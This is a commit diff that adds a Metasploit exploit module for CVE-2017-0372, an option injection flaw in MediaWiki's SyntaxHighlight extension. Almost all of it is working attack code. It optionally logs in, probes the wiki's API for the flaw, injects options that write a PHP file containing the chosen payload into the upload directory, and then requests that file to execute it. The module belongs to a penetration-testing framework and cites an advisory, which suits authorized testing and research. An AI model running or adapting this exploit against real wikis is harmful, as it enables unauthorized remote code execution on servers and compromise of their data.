MediaWiki SyntaxHighlight extension exploit module

ykoster · web-flow · commit 1569d2cf8e56 · 2017-04-29T14:29:56.000+02:00
This module exploits an option injection vulnerability in the SyntaxHighlight extension of MediaWiki. It tries to create &amp; execute a PHP file in the document root. The USERNAME &amp; PASSWORD options are only needed if the Wiki is configured as private.
diff --git a/modules/exploits/multi/http/mediawiki_syntaxhighlight.rb b/modules/exploits/multi/http/mediawiki_syntaxhighlight.rb
@@ -0,0 +1,157 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'MediaWiki SyntaxHighlight extension option injection vulnerability',
+      'Description'    => %q{
+        This module exploits an option injection vulnerability in the SyntaxHighlight 
+        extension of MediaWiki. It tries to create & execute a PHP file in the document root.
+        The USERNAME & PASSWORD options are only needed if the Wiki is configured as private.
+      },
+      'Author' => 'Yorick Koster',
+      'License' => MSF_LICENSE,
+      'Platform' => 'php',
+      'Payload' => { 'BadChars' => "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f ,'\"" } ,
+      'References' =>
+        [
+          [ 'CVE', '2017-0372' ],
+          [ 'URL', 'https://lists.wikimedia.org/pipermail/mediawiki-announce/2017-April/000207.html' ],
+          [ 'URL', 'https://phabricator.wikimedia.org/T158689' ],
+          [ 'URL', 'https://securify.nl/advisory/SFY20170201/syntaxhighlight_mediawiki_extension_allows_injection_of_arbitrary_pygments_options.html' ]
+        ],
+      'Arch' => ARCH_PHP,
+      'Targets' =>
+        [
+          ['Automatic Targeting', { 'auto' => true }  ],
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Mar 01 2017'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "MediaWiki base path (eg, /w, /wiki, /mediawiki)", '/wiki' ]),
+        OptString.new('UPLOADPATH', [ true, "Relative local upload path", 'images' ]),
+        OptString.new('USERNAME', [ false, "Username to authenticate with", '' ]),
+        OptString.new('PASSWORD', [ false, "Password to authenticate with", '' ]),
+        OptBool.new('CLEANUP', [ false, "Delete created PHP file?", true ])
+      ])
+  end
+  
+  def check
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api.php'),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'action' => 'parse',
+        'format' => 'json',
+        'contentmodel' => 'wikitext',
+        'text' => '<syntaxhighlight lang="java" start="0,full=1"></syntaxhighlight>'
+      }
+    })
+    
+    if(res && res.headers.key?('MediaWiki-API-Error'))
+      if(res.headers['MediaWiki-API-Error'] == 'internal_api_error_MWException')
+        return Exploit::CheckCode::Appears
+      elsif(res.headers['MediaWiki-API-Error'] == 'readapidenied')
+        print_error("Login is required")
+      end
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Safe
+  end
+  
+  # use deprecated interface
+  def login
+    print_status("Trying to login....")
+    # get login token
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api.php'),
+      'vars_post' => {
+        'action' => 'login',
+        'format' => 'json',
+        'lgname' => datastore['USERNAME']
+      }
+    })
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out')
+    end
+    json = res.get_json_document
+    if json.empty? || !json['login'] || !json['login']['token']
+      fail_with(Failure::Unknown, 'Server returned an invalid response')
+    end
+    logintoken = json['login']['token']
+    @cookie = res.get_cookies
+
+    # login
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api.php'),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'action' => 'login',
+        'format' => 'json',
+        'lgname' => datastore['USERNAME'],
+        'lgpassword' => datastore['PASSWORD'],
+        'lgtoken' => logintoken
+      }
+    })
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out')
+    end
+    json = res.get_json_document
+    if json.empty? || !json['login'] || !json['login']['result']
+      fail_with(Failure::Unknown, 'Server returned an invalid response')
+    end
+    if json['login']['result'] == 'Success'
+      @cookie = res.get_cookies
+    else
+      fail_with(Failure::Unknown, 'Failed to login')
+    end
+  end
+
+  def exploit
+    @cookie = ''
+    if datastore['USERNAME'] && datastore['USERNAME'].length > 0
+      login
+    end
+    
+    check_code = check
+    unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
+      fail_with(Failure::NoTarget, "#{peer}")
+    end
+
+    phpfile = rand_text_alpha_lower(25) + '.php'
+    cssfile = datastore['UPLOADPATH'] + '/' + phpfile
+    cleanup = "unlink(\"#{phpfile}\");"
+    if not datastore['CLEANUP']
+      cleanup = ""
+    end
+    print_status("Local PHP file: #{cssfile}")
+    
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api.php'),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'action' => 'parse',
+        'format' => 'json',
+        'contentmodel' => 'wikitext',
+        'text' => "<syntaxhighlight lang='java' start='0,full=1,cssfile=#{cssfile},classprefix=&lt;?php #{cleanup}#{payload.encoded} exit;?&gt;'></syntaxhighlight>"
+      }
+    })
+    if res
+      print_status("Trying to run #{normalize_uri(target_uri.path, cssfile)}")
+      send_request_cgi({'uri' => normalize_uri(target_uri.path, cssfile)})
+    end
+  end
+end
